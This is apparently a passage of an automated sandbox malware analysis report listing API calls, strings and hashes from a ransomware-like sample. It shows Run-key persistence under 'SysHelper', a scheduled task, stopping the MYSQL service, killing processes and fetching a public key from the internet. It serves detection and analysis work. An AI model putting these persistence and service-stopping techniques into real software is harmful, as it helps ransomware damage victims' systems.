                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                  • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                    • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                  • vswprintf.LIBCMT ref: 00454B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                  • _memset.LIBCMT ref: 004123B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                  Strings
                                                                                                  • SysHelper, xrefs: 004123D6
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                  • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                  • _memset.LIBCMT ref: 0040DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                    • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call
                                                                                                  • API String ID: 2464034642-3612616537
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004235B1
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                  • __allrem.LIBCMT ref: 004236F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                  • __allrem.LIBCMT ref: 00423726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                  • __allrem.LIBCMT ref: 0042375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 790675137-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                  • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                  • _memmove.LIBCMT ref: 0040C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0041E707
                                                                                                    • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • InternetOpenW.WININET ref: 0041E743
                                                                                                  • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                  • _memmove.LIBCMT ref: 0041E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                  • _strstr.LIBCMT ref: 0041EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                  • _malloc.LIBCMT ref: 0041EB86
                                                                                                  • _memset.LIBCMT ref: 0041EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                  • _strstr.LIBCMT ref: 0041EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                  • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                  • API String ID: 1302938615-3129329331
                                                                                                  • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                  • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___unDName.LIBCMT ref: 0043071B
                                                                                                  • _strlen.LIBCMT ref: 0043072E
                                                                                                  • __lock.LIBCMT ref: 0043074A
                                                                                                  • _malloc.LIBCMT ref: 0043075C
                                                                                                  • _malloc.LIBCMT ref: 0043076D
                                                                                                  • _free.LIBCMT ref: 004307B6
                                                                                                    • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                  • _free.LIBCMT ref: 004307AF
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3704956918-0
                                                                                                  • Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                  • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                  • Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                  • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00411B1E
                                                                                                  • timeGetTime.WINMM ref: 00411B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                  • timeGetTime.WINMM ref: 00411B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                  • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00425141
                                                                                                    • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                    • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                    • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                  • __mtterm.LIBCMT ref: 0042514F
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                    • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00425174
                                                                                                  • __initptd.LIBCMT ref: 00425196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                  • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                  • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
